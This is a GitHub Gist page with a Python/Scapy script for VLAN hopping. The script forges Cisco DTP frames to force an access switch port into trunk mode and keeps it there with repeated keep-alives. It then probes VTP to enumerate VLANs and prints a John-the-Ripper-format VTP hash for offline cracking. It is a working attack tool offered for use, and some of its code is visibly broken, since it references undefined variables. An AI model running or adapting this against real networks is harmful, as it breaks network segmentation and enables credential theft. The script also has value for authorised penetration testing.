Created
August 3, 2024 07:29
-
-
Save fl0l0u/b874617b2f54028a523d049af182d66b to your computer and use it in GitHub Desktop.
Vlan hopping via DTP with VTP probbing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import threading | |
| import time | |
| import scapy | |
| import scapy.contrib.dtp | |
| from scapy.contrib.dtp import * | |
| import scapy.contrib.vtp | |
| from scapy.contrib.vtp import * | |
| from scapy.sendrecv import sniff | |
| from scapy.layers.l2 import * | |
| from scapy.interfaces import resolve_iface | |
| from scapy.sendrecv import AsyncSniffer | |
| # FlL: originally broken condition | |
| VTPVlanInfo.fields_desc[-1].cond = lambda pkt:pkt.type == pkt.type | |
| config = { | |
| 'verbose' : False, | |
| 'debug' : False, | |
| 'force' : False, | |
| 'iface' : 'eth0', | |
| 'domain': b'\x00'*8 | |
| } | |
| stop_threads = False | |
| # -- utils -- | |
| class Logger: | |
| @staticmethod | |
| def _out(x): | |
| if config['debug'] or config['verbose']: | |
| sys.stdout.write(x + '\n') | |
| @staticmethod | |
| def dbg(x): | |
| if config['debug']: | |
| sys.stdout.write('[dbg] ' + x + '\n') | |
| @staticmethod | |
| def out(x): | |
| Logger._out('[.] ' + x) | |
| @staticmethod | |
| def info(x): | |
| Logger._out('[?] ' + x) | |
| @staticmethod | |
| def err(x): | |
| sys.stdout.write('[!] ' + x + '\n') | |
| @staticmethod | |
| def fail(x): | |
| Logger._out('[-] ' + x) | |
| @staticmethod | |
| def ok(x): | |
| Logger._out('[+] ' + x) | |
| # -- DTP -- | |
| def capture_dtp(): | |
| print('[.] Listening for DTP packet') | |
| src = resolve_iface(config['iface']).mac | |
| pkt = sniff(filter=f'ether src not {src} and ether dst 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2004 or ether[20:2] = 0x2004)', iface=config['iface'], count=1, timeout=35) | |
| if len(pkt) > 0: | |
| print('[+] DTP packet captured!') | |
| return pkt[0] | |
| else: | |
| Logger.fail('No DTP packet sniffed in 35s') | |
| print('[!] VLAN Hopping is not possible.') | |
| return False | |
| def inspect_dtp(dtp): | |
| # https://gitlab.com/wireshark/wireshark/-/blob/master/epan/dissectors/packet-dtp.c#L69 | |
| dtpstatus = ord(dtp[DTPStatus].status) | |
| dtptos = { 0x00: 'Access', 0x80: 'Trunk' }[(dtpstatus & 0x80)] | |
| dtptas = { 0x01: 'On', 0x02: 'Off', 0x03: 'Desirable', 0x04: 'Auto' }[(dtpstatus & 0x07)] | |
| Logger.info(f'DTP status Operative:{dtptos} / Administrative:{dtptas}') | |
| if dtpope == 'Trunk': | |
| print('[+] Already in trunk mode') | |
| elif dtpadm in ('On', 'Desirable', 'Auto'): | |
| print('[+] Access mode, trunk is negociable') | |
| else: | |
| print('[!] Access mode, trunk is not negociable') | |
| return False | |
| print('[>] After Hopping to other VLANs - leave this program running to maintain connections.') | |
| return True | |
| def flood_trunking(): | |
| while not stop_threads: | |
| src = resolve_iface(config['iface']).mac | |
| dot3 = Dot3(src=src, dst='01:00:0c:cc:cc:cc') | |
| llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) | |
| snap = SNAP(OUI=0x0c, code=0x2004) | |
| # DTP, Status = Access/Desirable (3), Type: Trunk (3) | |
| dtp = DTP(ver=1, tlvlist=[ | |
| DTPDomain(domain=config['domain']), | |
| DTPStatus(type=2, status=b'\x03'), | |
| DTPType(type=3, dtptype=b'\xa5', length=5), | |
| DTPNeighbor(type=4, neighbor=src) | |
| ]) | |
| frame = dot3 / llc / snap / dtp | |
| Logger.dbg(f'SENT: DTP Trunk Keep-Alive:\n{frame.summary()}') | |
| sendp(frame, iface=config['iface'], verbose=False) | |
| time.sleep(30) | |
| def enable_trunking(): | |
| print('[.] Initiating DTP trunk') | |
| t = threading.Thread(target=flood_trunking) | |
| t.daemon = True | |
| t.start() | |
| return t | |
| def check_trunking(): | |
| dtp = capture_dtp() | |
| stat = -1 | |
| if dtp: | |
| for tlv in dtp[DTP].tlvlist: | |
| if tlv.type == 2: | |
| stat = ord(tlv.status) | |
| if stat > 63: | |
| print('[+] Port is operating in Trunk status') | |
| return True | |
| print('[-] Port is operating in Access status') | |
| return False | |
| def revert_trunking(): | |
| src = resolve_iface(config['iface']).mac | |
| dot3 = Dot3(src=src, dst='01:00:0c:cc:cc:cc') | |
| llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) | |
| snap = SNAP(OUI=0x0c, code=0x2004) | |
| # DTP, Status = Access/Desirable (2), Type: Trunk (3) | |
| dtp = DTP(ver=1, tlvlist=[ | |
| DTPDomain(domain=b'\x00\x00\x00\x00\x00\x00\x00\x00'), | |
| DTPStatus(type=2, status=b'\x02'), | |
| DTPType(type=3, dtptype=b'\xa5', length=5), | |
| DTPNeighbor(type=4, neighbor=src) | |
| ]) | |
| frame = dot3 / llc / snap / dtp | |
| Logger.dbg(f'SENT: DTP Trunk Shutdown:\n{frame.summary()}') | |
| sendp(frame, iface=config['iface'], verbose=False) | |
| # -- VTP -- | |
| def probe_vtp(): | |
| print('[.] Probing VTP to determine vlans') | |
| iface = config['iface'] | |
| src = resolve_iface(config['iface']).mac | |
| ether = Ether(dst='01:00:0c:cc:cc:cc') | |
| llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) | |
| snap = SNAP(OUI=0x0c, code=0x2003) | |
| vtp = VTP(ver=1, code=3, domname=config['domain']) | |
| frame = ether / llc / snap / vtp | |
| Logger.dbg(f'SENT: VTP Adv Request:\n{frame.summary()}') | |
| sniffer = AsyncSniffer(filter='ether dst 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2003 or ether[20:2] = 0x2003)',iface=iface, count=2, timeout=3) | |
| sniffer.start() | |
| sendp(frame, iface=iface, verbose=False) | |
| pkts = sniffer.stop() | |
| if len(pkts) < 2: | |
| print('No VTP response, assuming VPT is off on interface') | |
| return | |
| # recover jth vtp hash | |
| vlans_data = None | |
| salt = None | |
| # diplay info | |
| for pkt in pkts: | |
| if pkt[VTP].vlaninfo: | |
| data = bytes(pkt[LLC].payload) | |
| vlans_data = bytes(pkt[VTP])[40:] | |
| for vlaninfo in pkt[VTP].vlaninfo: | |
| if isinstance(vlaninfo, VTPVlanInfo): | |
| vtype = vlaninfo.get_field('type').i2s[vlaninfo.getfieldval('type')] | |
| vstatus = vlaninfo.get_field('status').i2s[vlaninfo.getfieldval('status')] | |
| vname = vlaninfo.vlanname.decode('ascii').rstrip('\x00') | |
| print(f'[+] {vtype} vlan "{vname}" ID:{vlaninfo.vlanid}, status:{vstatus}') | |
| if vlaninfo.status == 0 and vlaninfo.type == 1: | |
| # Setup interface for this VLAN | |
| Logger.info(f'- adding interface {iface}.{vlaninfo.vlanid} ...') | |
| else: | |
| h = pkt[VTP].md5 | |
| salt = bytes(pkt[VTP]) | |
| if vlans_data and salt: | |
| print("[+] VTP JtR hash: $vtp$%d$%s$%s$%s$%s$%s" % (salt[0], len(vlans_data), vlans_data.hex(), len(salt), salt.hex(), h.hex())) | |
| # -- Main -- | |
| dtp = capture_dtp() | |
| if dtp: | |
| config['domain'] = dtp[DTPDomain].domain | |
| if inspect_dtp(dtp): | |
| enable_trunking() | |
| if check_trunking(): | |
| time.sleep(1) | |
| probe_vtp() | |
| try: | |
| while True: | |
| time.sleep(0.2) | |
| except KeyboardInterrupt: | |
| print('\n[>] Cleaning up...') | |
| revert_trunking() | |
| stop_threads = True | |
| time.sleep(1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment